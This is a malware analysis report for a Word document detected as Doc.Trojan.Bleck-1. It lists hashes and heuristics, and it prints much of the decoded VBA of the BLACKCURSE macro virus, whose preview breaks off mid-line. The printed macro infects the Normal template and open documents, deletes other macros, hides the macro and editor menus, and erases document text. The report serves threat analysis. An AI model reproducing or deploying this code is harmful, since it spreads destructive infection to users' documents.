Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 02776e6538c5aa68…

MALICIOUS

Office (OLE)

38.5 KB Created: 2000-12-21 05:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 4882a0eb41f91baaf37b1fe7dda56a52 SHA-1: fa1894ed82be0d2e37b613e640d02de117eba5c2 SHA-256: 02776e6538c5aa681537e4e8c31a1b223aea9787e06130f72346ed82c75a7fed
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.Bleck-1. It contains VBA macros, including AutoOpen and AutoClose functions, which are commonly used to execute malicious code upon opening or closing the document. The VBA script appears to be designed to obfuscate its presence and potentially spread itself to other documents.

Heuristics 5

  • ClamAV: Doc.Trojan.Bleck-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bleck-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17997 bytes
SHA-256: b0ee136876e8c3de4faec1ea1b34de2fe45993f7edcbb94f6de2caeb0bf0f55f
Detection
ClamAV: Doc.Trojan.Bleck-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "BLACKCURSE"
Sub BLACKCURSE()
    ' W97M/BLACKCURSE
    ' BY BLACKROSE OF CAMARINES SUR
    ' BLACKROSE IS ALSO KNOWN AS ULTRAVIOLET,
    ' SKYFIRE AND BLACKVIRGOCODER
    On Error Resume Next
    Dim NormlTemp, ActivDoc As Boolean, Cntr As Double, WhereWeAre As Object
    Call AboutTheAuthor
    Set BlackNormalObj = NormalTemplate.VBProject.VBComponents
    Set BlackActiveObj = ActiveDocument.VBProject.VBComponents
    For Cntr = 1 To BlackNormalObj.Count
        MName = BlackNormalObj.Item(Cntr).Name
            If MName = "BLACKCURSE" Then
                NormlTemp = True
                Set WhereWeAre = BlackNormalObj.Item("BLACKCURSE").Codemodule
            End If
            If (MName <> "BLACKCURSE") And (MName <> "ThisDocument") Then
                BlackNormalObj.Item(Cntr).Codemodule.Deletelines 1, BlackNormalObj.Item(Cntr).Codemodule.CountOfLines
            End If
    Next Cntr
    For Each Baby In Documents
        ActivDoc = False
        Set BlackActiveObj = Baby.VBProject.VBComponents
        For Cntr = 1 To BlackActiveObj.Count
            MName = BlackActiveObj.Item(Cntr).Name
                If MName = "BLACKCURSE" Then
                    ActivDoc = True
                    Set WhereWeAre = BlackActiveObj.Item("BLACKCURSE").Codemodule
                End If
                If (MName <> "BLACKCURSE") And (MName <> "ThisDocument") Then
                    BlackActiveObj.Item(Cntr).Codemodule.Deletelines 1, BlackNormalObj.Item(Cntr).Codemodule.CountOfLines
                End If
        Next Cntr
        If NormlTemp And Not ActivDoc Then
            Spread BD:=BlackActiveObj.Add(1), BS:=WhereWeAre
               If InStr(1, ActiveDocument.Name, "Document", 1) = 0 Then
                   ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=0
               End If
        End If
    Next Baby
    If Not NormlTemp Then
            Stealth
            Spread BD:=BlackNormalObj.Add(1), BS:=WhereWeAre
            NormalTemplate.Save
    End If
End Sub
Function Spread(BD As Object, BS As Object)
    On Error Resume Next
        Cntr = 1
        BD.Name = "BLACKCURSE"
        Do While BS.Lines(Cntr, 1) <> ""
            BD.Codemodule.Insertlines Cntr, BS.Lines(Cntr, 1)
            Cntr = Cntr + 1
        Loop
End Function
Sub Stealth()
    On Error Resume Next
        CustomizationContext = NormalTemplate
        CommandBars("Tools").Controls("Macro").Enabled = False
        CommandBars("Tools").Controls("Options").Enabled = False
        CommandBars("Visual Basic").Enabled = False
        CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
        CommandBars("Visual Basic").Protection = msoBarNoCustomize
        FindKey(BuildKeyCode(122, 1024)).Disable
        FindKey(BuildKeyCode(119, 1024)).Disable
        CommandBars("Visual Basic").Visible = False
End Sub
Sub AboutTheAuthor()
    On Error Resume Next
        With Dialogs(86)
          .Title = "BLACKCURSE"
          .Author = "BLACKROSE"
          .Execute
        End With
End Sub
Sub ActivateBLACKCURSE()
    On Error Resume Next
        Mensahe = """HIJADIPUTA KANG HAYUP KA!" & vbCrLf & _
                  "BURAY MO, SAKA BURAY NI INA MO! HAYUP KA!" & vbCrLf & _
                  "SAYANG KA, HAYUP KA!" & vbCrLf & _
                  "HAYUP KA TALAGA!"""
        If Documents.Count = 0 Then
            Documents.Add
        Else
            Selection.WholeStory
            Selection.Delete Unit:=1, Count:=1
        End If
        If ActiveWindow.View.SplitSpecial = wdPaneNone Then
            ActiveWindow.ActivePane.View.Type = wdPageView
        Else
            ActiveWindow.View.Type = wdPageView
        End If
        Application.Caption = "Birthday ko " & Date
        W
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.